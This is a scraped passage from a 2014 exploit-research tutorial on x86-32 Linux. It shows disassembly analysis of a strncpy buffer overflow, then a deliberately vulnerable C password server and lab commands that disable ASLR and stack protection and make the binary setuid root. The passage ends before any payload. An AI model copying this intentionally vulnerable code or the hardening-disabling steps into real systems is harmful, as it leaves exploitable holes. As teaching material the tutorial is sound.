0x8048510 lt;strncpy@pltgt;/span/span span class="code-line"span class="go" 0x080486d2 lt;+48gt;: mov DWORD PTR [esp+0x4],0x8048815/span/span span class="code-line"span class="go" 0x080486da lt;+56gt;: lea eax,[ebp-0x20c]/span/span span class="code-line"span class="go" 0x080486e0 lt;+62gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x080486e3 lt;+65gt;: call 0x8048460 lt;strcmp@pltgt;/span/span span class="code-line"span class="go" 0x080486e8 lt;+70gt;: mov DWORD PTR [ebp-0xc],eax/span/span span class="code-line"span class="go" 0x080486eb lt;+73gt;: mov eax,DWORD PTR [ebp-0xc]/span/span span class="code-line"span class="go" 0x080486ee lt;+76gt;: leave /span/span span class="code-line"span class="go" 0x080486ef lt;+77gt;: ret /span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"/code/pre/div /td/tr/table pIn the prologue, 0x228 bytes (or 552 bytes) are reserved for local variables and function call arguments./p pThe interesting call here is the call to codestrncpy/code but we need to examine the call to codestrlen/code first because it looks like output is the third argument to codestrncpy/code./p pThe call to codestrlen/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x" 0x080486ab lt;+9gt;: mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 0x080486ae lt;+12gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 0x080486b1 lt;+15gt;: call 0x80484d0 lt;strlen@pltgt;/span/span span class="code-line"/code/pre/div /td/tr/table pIt's clear the first argument is being used as the argument to codestrlen/code. Return values are normally passed using the EAX register./p pHere is the call to codestrncpy/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x" 0x080486b6 lt;+20gt;: add eax,0x1/span/span span class="code-line"span class="x" 0x080486b9 lt;+23gt;: mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 0x080486bd lt;+27gt;: mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 0x080486c0 lt;+30gt;: mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 0x080486c4 lt;+34gt;: lea eax,[ebp-0x20c]/span/span span class="code-line"span class="x" 0x080486ca lt;+40gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 0x080486cd lt;+43gt;: call 0x8048510 lt;strncpy@pltgt;/span/span span class="code-line"/code/pre/div /td/tr/table pYou can see that 1 is added to the return value and it is put on the stack as the third argument to codestrncpy/code./p pThe pointer to the function argument is then put on the stack as the second argument (on line 3 and 4)./p pLastly the address of the local variable is then put on the stack as the first argument (on lines 5 and 6)./p pHere we can see that the local variable is 0x20c bytes (524 bytes) away from EBP, meaning that we'll need to write 528 bytes until we overwrite EIP using an overflow here, 4 bytes are added for the old EBP saved during the prologue./p pLooking at the prototype for codestrncpy/code (using codeman strncpy/code), we can see that the first argument is the destination, second the source and third the maximum characters to copy:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go" char *strncpy(char *dest, const char *src, size_t n);/span/span span class="code-line"/code/pre/div /td/tr/table pKnowing all of this, its easy to see that there is in fact a buffer overflow here because the developer has used the length of the input buffer to bound the copy function. We can even see how many bytes we have until we overwrite EIP./p h2Conclusion/h2 pWhile its technically possible to just fuzz all of the application inputs, the more complex the application gets the more infeasible it becomes./p pThis is also true for reverse engineering every section of an application so its important that you know how to focus on the important parts of the application./p pUltimately reverse engineering is much more powerful than fuzzing but both should be used in combination to increase efficiency./p pHappy Hacking :-)/p

eXploit
Remote Exploitation0xe7
12 June 2014 at 21:59

Remote Exploitation

eXploit

By: 0xe7

12 June 2014 at 21:59

pThis is the third part in our series on exploit research on x86-32 Linux systems. a href="/x86-32-linux/2014/05/08/plain-buffer-overflow/"Part 1/a was an introduction into a href="http://en.wikipedia.org/wiki/Buffer_overflow" target="_blank"buffer overflows/a and a href="/x86-32-linux/2014/05/20/plain-format-string-vulnerability/"part 2/a was an introduction to a href="http://en.wikipedia.org/wiki/Uncontrolled_format_string" target="_blank"format string vulnerabilities/a./p pBoth of the previous posts have been targeting local applications, here I will introduce remote exploitation and try to describe the differences between exploiting a local or a remote application while demonstrating remote exploitation./p !-- more -- h2The Vulnerable App/h2 pI've tried to keep the application as similar to the application we used in part 1 and 2 as possible, obviously some changes needed to be made:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/span span class="code-line"span class="normal"56/span/span span class="code-line"span class="normal"57/span/span span class="code-line"span class="normal"58/span/span span class="code-line"span class="normal"59/span/span span class="code-line"span class="normal"60/span/span span class="code-line"span class="normal"61/span/span span class="code-line"span class="normal"62/span/span span class="code-line"span class="normal"63/span/span span class="code-line"span class="normal"64/span/span span class="code-line"span class="normal"65/span/span span class="code-line"span class="normal"66/span/span span class="code-line"span class="normal"67/span/span span class="code-line"span class="normal"68/span/span span class="code-line"span class="normal"69/span/span span class="code-line"span class="normal"70/span/span span class="code-line"span class="normal"71/span/span span class="code-line"span class="normal"72/span/span span class="code-line"span class="normal"73/span/span span class="code-line"span class="normal"74/span/span span class="code-line"span class="normal"75/span/span span class="code-line"span class="normal"76/span/span span class="code-line"span class="normal"77/span/span span class="code-line"span class="normal"78/span/span span class="code-line"span class="normal"79/span/span span class="code-line"span class="normal"80/span/span span class="code-line"span class="normal"81/span/span span class="code-line"span class="normal"82/span/span span class="code-line"span class="normal"83/span/span span class="code-line"span class="normal"84/span/span span class="code-line"span class="normal"85/span/span span class="code-line"span class="normal"86/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;sys/socket.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;netinet/in.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;strings.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="cp"#define PASS quot;topsecretpasswordquot;/span/span span class="code-line"span class="cp"#define SFILE quot;secret.txtquot;/span/span span class="code-line"span class="cp"#define PORT 9999/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"sendfile/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"senderror/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[]);/spanspan class="w"/span/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"p/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"main/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"listenfd/spanspan class="p",/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"n/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="p",/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"servaddr/spanspan class="p",/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"socklen_t/spanspan class="w" /spanspan class="n"clilen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"pid_t/spanspan class="w" /spanspan class="n"childpid/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"pwd/spanspan class="p"[/spanspan class="mi"1000/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"listenfd/spanspan class="o"=/spanspan class="n"socket/spanspan class="p"(/spanspan class="n"AF_INET/spanspan class="p",/spanspan class="n"SOCK_STREAM/spanspan class="p",/spanspan class="mi"0/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"bzero/spanspan class="p"(/spanspan class="o"amp;/spanspan class="n"servaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"servaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"servaddr/spanspan class="p"./spanspan class="n"sin_family/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"AF_INET/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"servaddr/spanspan class="p"./spanspan class="n"sin_addr/spanspan class="p"./spanspan class="n"s_addr/spanspan class="o"=/spanspan class="n"htonl/spanspan class="p"(/spanspan class="n"INADDR_ANY/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"servaddr/spanspan class="p"./spanspan class="n"sin_port/spanspan class="o"=/spanspan class="n"htons/spanspan class="p"(/spanspan class="n"PORT/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"((/spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"bind/spanspan class="p"(/spanspan class="n"listenfd/spanspan class="p",(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"servaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"servaddr/spanspan class="p")))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error: Unable to bind to port %d/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"PORT/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"listen/spanspan class="p"(/spanspan class="n"listenfd/spanspan class="p",/spanspan class="mi"1024/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"for/spanspan class="p"(;;)/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"clilen/spanspan class="o"=/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"connfd/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"accept/spanspan class="p"(/spanspan class="n"listenfd/spanspan class="p",(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="o"amp;/spanspan class="n"clilen/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"n/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"recvfrom/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"pwd/spanspan class="p",/spanspan class="w" /spanspan class="mi"1000/spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"clilen/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"pwd/spanspan class="p"[/spanspan class="n"n/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"checkpass/spanspan class="p"(/spanspan class="n"pwd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"r/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"senderror/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="n"pwd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendfile/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Received the following:/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;%s/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"pwd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"close/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"sendfile/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"FILE/spanspan class="w" /spanspan class="o"*/spanspan class="n"f/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"f/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"fopen/spanspan class="p"(/spanspan class="n"SFILE/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;rquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"f/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"((/spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"getc/spanspan class="p"(/spanspan class="n"f/spanspan class="p"))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"EOF/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"c/spanspan class="p",/spanspan class="w" /spanspan class="mi"1/spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fclose/spanspan class="p"(/spanspan class="n"f/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error opening file: quot;/spanspan class="w" /spanspan class="n"SFILE/spanspan class="w" /spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"senderror/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[])/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;Wrong password: quot;/spanspan class="p",/spanspan class="w" /spanspan class="mi"16/spanspan class="w" /spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"p/spanspan class="p"),/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="mi"1/spanspan class="w" /spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"a/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[/spanspan class="mi"512/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"strncpy/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"a/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"a/spanspan class="p")/spanspan class="o"+/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strcmp/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"PASS/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThe main differences here are that the communication between the user and the application is done over a network, instead of via command line arguments, and that there is no format string vulnerability./p h3The Fix/h3 pThe vulnerability is in the same line as the a href="/x86-32-linux/2014/05/08/plain-buffer-overflow/"plain buffer overflow post/a in the codecheckpass/code function on line 82. This should be changed to codestrncpy(p, a, sizeof(p)-1);/code and explicitly insert the null character at the end codep[512] = '\0';/code./p h2Setting Up The Environment/h2 pThere are 3 main differences (and a few minor ones) when doing exploit development for remote applications. The first is pretty obvious, when doing exploit research it is impossible to develop an exploit on a target application which resides on a machine which you don't control./p pWhile its best not to develop an exploit on a target machine (because you want to be as quiet as possible so not to raise suspicion of the administrator), with local application attacks it is assumed that you already have access to the machine (otherwise you will not be able to attack it) so it is totally possible to do the development on the target machine providing the tools that you need are on there (ie. a debugger, disassembler, compiler...) or you have the means to install them./p pBut with a network application it is unlikely that you already have access to the machine and as we have seen in the first 2 parts of this series while you are developing the exploit you will need to restart the application numerous times. For this reason it is best to do a lot of reconnaissance to get as much information about the environment that the application is running in as possible because you will then want to try to replicate that environment as much as possible for the development environment./p pThe more you replicate the real environment, the more likely you will succeed with the actual exploitation./p pI will be using the same system and environment as before but I will create a new user to run the application as:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~# /spanadduser appuser/span span class="code-line"span class="go"Adding user `appuser#39; .../span/span span class="code-line"span class="go"Adding new group `appuser#39; (1002) .../span/span span class="code-line"span class="go"Adding new user `appuser#39; (1002) with group `appuser#39; .../span/span span class="code-line"span class="go"Creating home directory `/home/appuser#39; .../span/span span class="code-line"span class="go"Copying files from `/etc/skel#39; .../span/span span class="code-line"span class="go"Enter new UNIX password: /span/span span class="code-line"span class="go"Retype new UNIX password: /span/span span class="code-line"span class="go"passwd: password updated successfully/span/span span class="code-line"span class="go"Changing the user information for testuser/span/span span class="code-line"span class="go"Enter the new value, or press ENTER for the default/span/span span class="code-line"span class="go" Full Name []: /span/span span class="code-line"span class="go" Room Number []: /span/span span class="code-line"span class="go" Work Phone []: /span/span span class="code-line"span class="go" Home Phone []: /span/span span class="code-line"span class="go" Other []: /span/span span class="code-line"span class="go"Is the information correct? [Y/n]/span/span span class="code-line"span class="gp"root@dev:~# /spanls/span span class="code-line"span class="go"app-net.c/span/span span class="code-line"span class="gp"root@dev:~# /spangcc -z execstack -fno-stack-protector -o app-net app-net.c/span span class="code-line"span class="gp"root@dev:~# /spancp app-net /home/appuser//span span class="code-line"span class="gp"root@dev:~# /spancat /proc/sys/kernel/randomize_va_space/span span class="code-line"span class="go"2/span/span span class="code-line"span class="gp"root@dev:~# /spanspan class="nb"echo/span span class="m"0/span gt; /proc/sys/kernel/randomize_va_space/span span class="code-line"span class="gp"root@dev:~# /spancat /proc/sys/kernel/randomize_va_space/span span class="code-line"span class="go"0/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanls -l/span span class="code-line"span class="go"total 8/span/span span class="code-line"span class="go"-rwxr-xr-x 1 root root 7824 Jun 15 13:48 app-net/span/span span class="code-line"span class="gp"root@dev:/home/appuser# /spanchmod u+s app-net /span span class="code-line"span class="gp"root@dev:/home/appuser# /spanls -l/span span class="code-line"span class="go"total 8/span/span span class="code-line"span class="go"-rwsr-xr-x 1 root root 7824 Jun 15 13:48 